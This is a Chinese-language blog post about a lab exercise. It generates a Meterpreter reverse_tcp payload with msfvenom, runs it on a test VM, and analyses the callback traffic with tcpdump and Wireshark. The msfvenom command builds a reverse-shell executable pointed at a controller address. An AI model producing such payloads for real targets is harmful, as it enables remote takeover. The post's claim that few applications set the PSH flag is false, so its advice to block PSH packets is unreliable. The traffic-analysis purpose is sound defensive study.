本篇文章主要记录一下自己的网络分析过程,以及总结一下网络分析相关的技术点。

0x01 生成Metasploit木马

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.211.55.2 LPORT=8877 -f exe -o hello.exe

基本可以看到,若目标执行hello.exe后会主动连接10.211.55.28877端口

网络环境:

  • 10.211.55.2/255.255.255.0
  • 10.211.55.11/255.255.255.0

0x02 获取数据过程

首先采用tcpdump这款命令行数据包分析工具:

-a:尝试将网络和广播地址转换成名称;
-c<数据包数目>:收到指定的数据包数目后,就停止进行倾倒操作;
-d:把编译过的数据包编码转换成可阅读的格式,并倾倒到标准输出;
-dd:把编译过的数据包编码转换成C语言的格式,并倾倒到标准输出;
-ddd:把编译过的数据包编码转换成十进制数字的格式,并倾倒到标准输出;
-e:在每列倾倒资料上显示连接层级的文件头;
-f:用数字显示网际网络地址;
-F<表达文件>:指定内含表达方式的文件;
-i<网络界面>:使用指定的网络截面送出数据包;
-l:使用标准输出列的缓冲区;
-n:不把主机的网络地址转换成名字;
-N:不列出域名;
-O:不将数据包编码最佳化;
-p:不让网络界面进入混杂模式;
-q :快速输出,仅列出少数的传输协议信息;
-r<数据包文件>:从指定的文件读取数据包数据;
-s<数据包大小>:设置每个数据包的大小;
-S:用绝对而非相对数值列出TCP关联数;
-t:在每列倾倒资料上不显示时间戳记;
-tt: 在每列倾倒资料上显示未经格式化的时间戳记;
-T<数据包类型>:强制将表达方式所指定的数据包转译成设置的数据包类型;
-v:详细显示指令执行过程;
-vv:更详细显示指令执行过程;
-x:用十六进制字码列出数据包资料;
-w<数据包文件>:把数据包数据写入指定的文件。
  • 参考:http://man.linuxde.net/tcpdump

10.211.55.2上分析10.211.55.11的连接数据包:

sudo tcpdump -i vnic0 -vv dst 10.211.55.2 and port 8877

开启监听

msf这边已经开启监听以及抓包分析

在被控端上执行hello.exe

➜  ~ sudo tcpdump -i vnic0 -vv dst 10.211.55.2 and port 8877
tcpdump: WARNING: vnic0: That device doesn't support promiscuous mode
(BIOCPROMISC: Invalid argument)
tcpdump: listening on vnic0, link-type EN10MB (Ethernet), capture size 262144 bytes
00:50:37.894897 IP (tos 0x0, ttl 128, id 11369, offset 0, flags [DF], proto TCP (6), length 52)
    windows-7.shared.49324 > 10.211.55.2.8877: Flags [S], cksum 0x8459 (correct), seq 3700655894, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
00:50:37.895086 IP (tos 0x0, ttl 128, id 11370, offset 0, flags [DF], proto TCP (6), length 40)
    windows-7.shared.49324 > 10.211.55.2.8877: Flags [.], cksum 0x1e7b (correct), seq 3700655895, ack 3460560733, win 256, length 0
00:50:37.926999 IP (tos 0x0, ttl 128, id 11371, offset 0, flags [DF], proto TCP (6), length 40)
    windows-7.shared.49324 > 10.211.55.2.8877: Flags [.], cksum 0xf68a (correct), seq 0, ack 10225, win 256, length 0
00:50:37.927139 IP (tos 0x0, ttl 128, id 11372, offset 0, flags [DF], proto TCP (6), length 40)
    windows-7.shared.49324 > 10.211.55.2.8877: Flags [.], cksum 0xbd82 (correct), seq 0, ack 24825, win 256, length 0
00:50:37.927242 IP (tos 0x0, ttl 128, id 11373, offset 0, flags [DF], proto TCP (6), length 40)
    windows-7.shared.49324 > 10.211.55.2.8877: Flags [.], cksum 0x7912 (correct), seq 0, ack 42345, win 256, length 0
00:50:37.927350 IP (tos 0x0, ttl 128, id 11374, offset 0, flags [DF], proto TCP (6), length 40)
    windows-7.shared.49324 > 10.211.55.2.8877: Flags [.], cksum 0x293a (correct), seq 0, ack 62785, win 256, length 0
00:50:37.927466 IP (tos 0x0, ttl 128, id 11375, offset 0, flags [DF], proto TCP (6), length 40)
    windows-7.shared.49324 > 10.211.55.2.8877: Flags [.], cksum 0xcdf9 (correct), seq 0, ack 86145, win 256, length 0
00:50:37.927676 IP (tos 0x0, ttl 128, id 11376, offset 0, flags [DF], proto TCP (6), length 40)
    windows-7.shared.49324 > 10.211.55.2.8877: Flags [.], cksum 0x6751 (correct), seq 0, ack 112425, win 256, length 0
00:50:37.927862 IP (tos 0x0, ttl 128, id 11377, offset 0, flags [DF], proto TCP (6), length 40)
    windows-7.shared.49324 > 10.211.55.2.8877: Flags [.], cksum 0xf540 (correct), seq 0, ack 141625, win 256, length 0
00:50:37.928066 IP (tos 0x0, ttl 128, id 11378, offset 0, flags [DF], proto TCP (6), length 40)
    windows-7.shared.49324 > 10.211.55.2.8877: Flags [.], cksum 0x77c8 (correct), seq 0, ack 173745, win 256, length 0
00:50:37.928178 IP (tos 0x0, ttl 128, id 11379, offset 0, flags [DF], proto TCP (6), length 40)
    windows-7.shared.49324 > 10.211.55.2.8877: Flags [.], cksum 0x6231 (correct), seq 0, ack 179272, win 256, length 0
00:50:38.323103 IP (tos 0x0, ttl 128, id 11380, offset 0, flags [DF], proto TCP (6), length 463)
    windows-7.shared.49324 > 10.211.55.2.8877: Flags [P.], cksum 0x3b8d (correct), seq 0:423, ack 179843, win 254, length 423
00:50:38.375995 IP (tos 0x0, ttl 128, id 11381, offset 0, flags [DF], proto TCP (6), length 232)
    windows-7.shared.49324 > 10.211.55.2.8877: Flags [P.], cksum 0xbf82 (correct), seq 423:615, ack 179971, win 253, length 192
00:50:38.441008 IP (tos 0x0, ttl 128, id 11382, offset 0, flags [DF], proto TCP (6), length 200)
    windows-7.shared.49324 > 10.211.55.2.8877: Flags [P.], cksum 0x76a7 (correct), seq 615:775, ack 180115, win 253, length 160
00:50:38.589346 IP (tos 0x0, ttl 128, id 11383, offset 0, flags [DF], proto TCP (6), length 40)
    windows-7.shared.49324 > 10.211.55.2.8877: Flags [.], cksum 0xdc3c (correct), seq 775, ack 212883, win 162, length 0
00:50:38.589354 IP (tos 0x0, ttl 128, id 11384, offset 0, flags [DF], proto TCP (6), length 40)
    windows-7.shared.49324 > 10.211.55.2.8877: Flags [.], cksum 0xdbde (correct), seq 775, ack 212883, win 256, length 0
00:50:38.589394 IP (tos 0x0, ttl 128, id 11385, offset 0, flags [DF], proto TCP (6), length 40)
    windows-7.shared.49324 > 10.211.55.2.8877: Flags [.], cksum 0xc50e (correct), seq 775, ack 218723, win 256, length 0
00:50:38.589643 IP (tos 0x0, ttl 128, id 11386, offset 0, flags [DF], proto TCP (6), length 40)
    windows-7.shared.49324 > 10.211.55.2.8877: Flags [.], cksum 0x19f6 (correct), seq 775, ack 262523, win 256, length 0
00:50:38.589909 IP (tos 0x0, ttl 128, id 11387, offset 0, flags [DF], proto TCP (6), length 40)
    windows-7.shared.49324 > 10.211.55.2.8877: Flags [.], cksum 0x6375 (correct), seq 775, ack 309243, win 256, length 0
00:50:38.590179 IP (tos 0x0, ttl 128, id 11388, offset 0, flags [DF], proto TCP (6), length 40)
    windows-7.shared.49324 > 10.211.55.2.8877: Flags [.], cksum 0xc02c (correct), seq 775, ack 351043, win 256, length 0
00:50:38.642138 IP (tos 0x0, ttl 128, id 11389, offset 0, flags [DF], proto TCP (6), length 1500)
    windows-7.shared.49324 > 10.211.55.2.8877: Flags [.], cksum 0x39a0 (correct), seq 775:2235, ack 351043, win 256, length 1460
00:50:38.642152 IP (tos 0x0, ttl 128, id 11390, offset 0, flags [DF], proto TCP (6), length 1500)
    windows-7.shared.49324 > 10.211.55.2.8877: Flags [.], cksum 0xa2aa (correct), seq 2235:3695, ack 351043, win 256, length 1460
00:50:38.642337 IP (tos 0x0, ttl 128, id 11391, offset 0, flags [DF], proto TCP (6), length 1056)
    windows-7.shared.49324 > 10.211.55.2.8877: Flags [P.], cksum 0x8865 (correct), seq 3695:4711, ack 351043, win 256, length 1016
00:50:38.697005 IP (tos 0x0, ttl 128, id 11392, offset 0, flags [DF], proto TCP (6), length 232)
    windows-7.shared.49324 > 10.211.55.2.8877: Flags [P.], cksum 0x291a (correct), seq 4711:4903, ack 351171, win 256, length 192
00:50:38.747969 IP (tos 0x0, ttl 128, id 11393, offset 0, flags [DF], proto TCP (6), length 328)
    windows-7.shared.49324 > 10.211.55.2.8877: Flags [P.], cksum 0x8f09 (correct), seq 4903:5191, ack 351299, win 255, length 288
00:50:38.800971 IP (tos 0x0, ttl 128, id 11394, offset 0, flags [DF], proto TCP (6), length 760)
    windows-7.shared.49324 > 10.211.55.2.8877: Flags [P.], cksum 0xd0fb (correct), seq 5191:5911, ack 351443, win 255, length 720
00:50:38.854073 IP (tos 0x0, ttl 128, id 11395, offset 0, flags [DF], proto TCP (6), length 936)
    windows-7.shared.49324 > 10.211.55.2.8877: Flags [P.], cksum 0x95e4 (correct), seq 5911:6807, ack 351571, win 254, length 896
00:50:38.927069 IP (tos 0x0, ttl 128, id 11396, offset 0, flags [DF], proto TCP (6), length 200)
    windows-7.shared.49324 > 10.211.55.2.8877: Flags [P.], cksum 0xee20 (correct), seq 6807:6967, ack 351699, win 254, length 160
00:50:38.997580 IP (tos 0x0, ttl 128, id 11397, offset 0, flags [DF], proto TCP (6), length 40)
    windows-7.shared.49324 > 10.211.55.2.8877: Flags [.], cksum 0xf2a8 (correct), seq 6967, ack 397607, win 111, length 0
00:50:38.997587 IP (tos 0x0, ttl 128, id 11398, offset 0, flags [DF], proto TCP (6), length 40)
    windows-7.shared.49324 > 10.211.55.2.8877: Flags [.], cksum 0xf217 (correct), seq 6967, ack 397607, win 256, length 0
00:50:38.997606 IP (tos 0x0, ttl 128, id 11399, offset 0, flags [DF], proto TCP (6), length 40)
    windows-7.shared.49324 > 10.211.55.2.8877: Flags [.], cksum 0xd5af (correct), seq 6967, ack 404907, win 228, length 0
00:50:38.997638 IP (tos 0x0, ttl 128, id 11400, offset 0, flags [DF], proto TCP (6), length 40)
    windows-7.shared.49324 > 10.211.55.2.8877: Flags [.], cksum 0xd593 (correct), seq 6967, ack 404907, win 256, length 0
00:50:38.997728 IP (tos 0x0, ttl 128, id 11401, offset 0, flags [DF], proto TCP (6), length 40)
    windows-7.shared.49324 > 10.211.55.2.8877: Flags [.], cksum 0xb2de (correct), seq 6967, ack 413827, win 221, length 0
00:50:38.997767 IP (tos 0x0, ttl 128, id 11402, offset 0, flags [DF], proto TCP (6), length 40)
    windows-7.shared.49324 > 10.211.55.2.8877: Flags [.], cksum 0xb2bb (correct), seq 6967, ack 413827, win 256, length 0
00:50:39.048095 IP (tos 0x0, ttl 128, id 11403, offset 0, flags [DF], proto TCP (6), length 424)
    windows-7.shared.49324 > 10.211.55.2.8877: Flags [P.], cksum 0x095d (correct), seq 6967:7351, ack 413827, win 256, length 384

收到数据 经过被控端执行后,与控制端之间的握手传递数据包如上

0x03 分析过程

首先我们找到握手包,也就是SYN为1的包:

00:50:37.894897 IP (tos 0x0, ttl 128, id 11369, offset 0, flags [DF], proto TCP (6), length 52)
    windows-7.shared.49324 > 10.211.55.2.8877: Flags [S], cksum 0x8459 (correct), seq 3700655894, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0

Flags在tcpdump工具中的表现形式是有效标志位会在[]中手写字母

也就是 Flags [S],在Wireshark中是Set

再往下找具有可疑特征的地方:

[1]00:50:37.928066 IP (tos 0x0, ttl 128, id 11378, offset 0, flags [DF], proto TCP (6), length 40)
    windows-7.shared.49324 > 10.211.55.2.8877: Flags [.], cksum 0x77c8 (correct), seq 0, ack 173745, win 256, length 0
[2]00:50:37.928178 IP (tos 0x0, ttl 128, id 11379, offset 0, flags [DF], proto TCP (6), length 40)
    windows-7.shared.49324 > 10.211.55.2.8877: Flags [.], cksum 0x6231 (correct), seq 0, ack 179272, win 256, length 0
[3]00:50:38.323103 IP (tos 0x0, ttl 128, id 11380, offset 0, flags [DF], proto TCP (6), length 463)
    windows-7.shared.49324 > 10.211.55.2.8877: Flags [P.], cksum 0x3b8d (correct), seq 0:423, ack 179843, win 254, length 423
[4]00:50:38.375995 IP (tos 0x0, ttl 128, id 11381, offset 0, flags [DF], proto TCP (6), length 232)
    windows-7.shared.49324 > 10.211.55.2.8877: Flags [P.], cksum 0xbf82 (correct), seq 423:615, ack 179971, win 253, length 192
[5]00:50:38.441008 IP (tos 0x0, ttl 128, id 11382, offset 0, flags [DF], proto TCP (6), length 200)
    windows-7.shared.49324 > 10.211.55.2.8877: Flags [P.], cksum 0x76a7 (correct), seq 615:775, ack 180115, win 253, length 160
[6]00:50:38.589346 IP (tos 0x0, ttl 128, id 11383, offset 0, flags [DF], proto TCP (6), length 40)
    windows-7.shared.49324 > 10.211.55.2.8877: Flags [.], cksum 0xdc3c (correct), seq 775, ack 212883, win 162, length 0
[7]00:50:38.589354 IP (tos 0x0, ttl 128, id 11384, offset 0, flags [DF], proto TCP (6), length 40)

为了方便查看,我把每个包都进行了编号,从1-7来看,[1][2]是比较正常的数据包,而到了[3][5]则出现了特征,数据包的标志位PSH设置为了1,并且数据包大小逐渐增大,也就是length长度,从40增长至463,再到200,最后恢复40。

Flags:从左到右,**[URG ACK PSH RST SYN FIN]**
  • ACK设置为1表示前面的确认(ack)是有效的,否则前面的确认应被忽略。

  • PSH表示要求对方在接到数据后立即请求递交给应用程序,而不是缓冲起来直到缓冲区收满为止。

  • RST用于重置一个已经混乱的连接。

  • SYN用于建立连接的过程。在链接请求中,SYN=1和ACK=0表示该数据段没有使用捎带的确认域。链接应答则捎带了一个确认,即SYN=1和ACK=1.本质上SYN位是用来表示CONNECTION REQUEST和CONNECTION ACCEPTED,然后进一步用ACK来区分是请求还是应答,的确很高明。

  • FIN用来释放一个连接。它表示发送方已经没有数据要传输了。然后,在关闭一个连接后,关闭进程可能会在一段不确定的时间内继续接收到数据。SYN和FIN数据段都有TCP序号,从而保证了这两种数据段被按照正确的顺序来进行处理。

  • 窗口大小:指定了从被确认的字节算起可以发送多少个字节。要深入理解这个域的含义,可以参看TCP用色控制和慢启动算法

  • 校验和:校验范围包括TCP头、数据报内容和概念性伪头部。概念性伪头部又包括源IP,目的IP,TCP协议号。

  • 紧急指针:指向数据报中紧急数据最后一个字节的下一个字节。

从木马行为来看,连接成功后,会传输一段比较大的数据,而这个数据包的标志位PSH必须为1

由此我们可以通过拦截网络中PSH1的数据包来阻断木马的传输,当然 可能会对使用其他协议的应用程序造成影响,但是它的效果却是理想的,查杀木马之前必然需要做快速发现、快速隔离、快速报警的动作,而PSH1的应用程序很少,这使得木马更容易被防火墙发现。

0x04 Wireshark 分析

sudo tcpdump -i vnic0 -vv dst 10.211.55.2 and port 8877 -w msf.cap

将接受到的数据包保存为文件,直接可以打开Wireshark分析~

Wireshark分析

可以看到,的确有几个数据包的PSH为1。

0x05 其他的一些思考

测试了一些meterpreter命令:

  • getuid
  • ifconfig
  • sysinfo

均带有PSH标志位

在不影响业务、系统的正常使用情况下,可以采用过滤PSH数据包的办法来降低木马带来的风险。